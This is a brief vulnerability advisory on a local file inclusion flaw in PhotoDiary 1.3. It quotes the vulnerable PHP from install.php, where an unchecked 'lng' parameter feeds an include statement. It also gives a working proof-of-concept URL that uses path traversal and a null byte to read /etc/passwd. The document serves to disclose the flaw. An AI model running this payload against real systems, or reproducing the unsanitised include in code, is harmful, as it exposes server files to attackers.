PhotoDiary 1.3 (lng) Local File Inclusion Vulnerability
Discovered by cOndemned
 
download: http://code.google.com/p/photodiary/
 
 
source of /admin/install.php (lines 9 - 15):
 
    if (isset($_GET['lng'])){
        $LNG = $_GET['lng'];            # 1
    } else {
        $LNG = "ITA";
    }
     
    include "../common/language_".$LNG.".php";  # 2
 
 
proof of concept:
         
    http://[target_host]/admin/install.php?lng=/../../../../../../etc/passwd%00